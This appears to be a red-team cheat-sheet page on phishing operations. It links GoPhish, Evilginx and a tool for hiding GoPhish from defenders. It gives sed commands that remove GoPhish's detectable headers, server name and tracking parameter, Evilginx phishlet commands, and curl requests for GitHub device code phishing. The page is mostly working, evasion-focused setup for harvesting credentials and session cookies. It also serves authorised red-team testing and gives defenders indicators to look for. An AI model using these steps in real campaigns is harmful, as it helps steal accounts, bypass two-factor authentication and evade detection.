phishing.md (3794B)
1 --- 2 title: "Phishing" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/access/phishing.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/access/phishing.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Phishing 12 13 > Phishing is a cybersecurity attack where malicious actors impersonate legitimate organizations (like banks, social media platforms, or email providers) to trick people into revealing sensitive information such as passwords, credit card numbers, or personal data. 14 15 ## Opsec Fails 16 17 * **Reusing IPs/Domains**: Using the same IP address or domain across multiple campaigns or malware families. 18 * **No Domain Privacy**: WHOIS records exposing registrant info (name, email, phone). 19 * **Same Registrant Email**: Reusing the same email address across domains. 20 * **Unrotated SSL Certificates**: Self-signed or identical certificates reused across phishing sites. 21 22 ## GoPhish 23 24 * [gophish/gophish](https://github.com/gophish/gophish) - Open-Source Phishing Toolkit 25 * [kgretzky/gophish/](https://github.com/kgretzky/gophish/) - Gophish integration with Evilginx 3.3 26 * [puzzlepeaches/sneaky_gophish](https://github.com/puzzlepeaches/sneaky_gophish) - Hiding GoPhish from the boys in blue 27 28 ```ps1 29 git clone https://github.com/gophish/gophish.git 30 go build 31 ``` 32 33 ### IOC 34 35 * `X-Gophish-Contact` and `X-Gophish-Signature` 36 37 ```ps1 38 find . -type f -exec sed -i.bak 's/X-Gophish-Contact/X-Contact/g' {} + 39 sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go 40 sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go 41 sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go 42 sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go 43 44 find . -type f -exec sed -i.bak 's/X-Gophish-Signature/X-Signature/g' {} + 45 sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go 46 ``` 47 48 * Default server name 49 50 ```ps1 51 sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go 52 ``` 53 54 * Default `rid` parameter 55 56 ```ps1 57 sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "keyname"/g' models/campaign.go 58 ``` 59 60 ## Evilginx 61 62 * [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) - Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication 63 * [evilginxpro](https://evilginx.com/) - The phishing framework for red teams 64 65 ```ps1 66 # List Available Phishlets 67 phishlets 68 69 # Enable a Phishlet 70 phishlets enable <phishlet_name> 71 72 # Disable a Phishlet 73 phishlets disable <phishlet_name> 74 ``` 75 76 ## Device Code Phishing 77 78 * Github 79 80 ```ps1 81 curl -X POST https://github.com/login/device/code \ 82 -H "Accept: application/json" \ 83 -d "client_id=01ab8ac9400c4e429b23&scope=user+repo+workflow" 84 85 curl -X POST https://github.com/login/oauth/access_token \ 86 -H "Accept: application/json" \ 87 -d "client_id=01ab8ac9400c4e429b23&device_code=be9<code_from_earlier>&&grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Adevice_code" -k | jq 88 ``` 89 90 ## References 91 92 * [A Smooth Sea Never Made a Skilled Phisherman - Kuba Gretzky - 8 july 2024](https://youtu.be/Nh99d3YnpI4) 93 * [Introducing: GitHub Device Code Phishing - John Stawinski, Mason Davis, Matt Jackoski - June 12, 2025](https://www.praetorian.com/blog/introducing-github-device-code-phishing/) 94 * [Never had a bad day phishing. How to set up GoPhish to evade security controls - Nicholas Anastasi - Jun 30, 2021](https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls) 95 * [Unraveling and Countering Adversary-in-the-Middle Phishing Attacks - Pawel Partyka - 8 july 2024](https://youtu.be/-W-LxcbUxI4)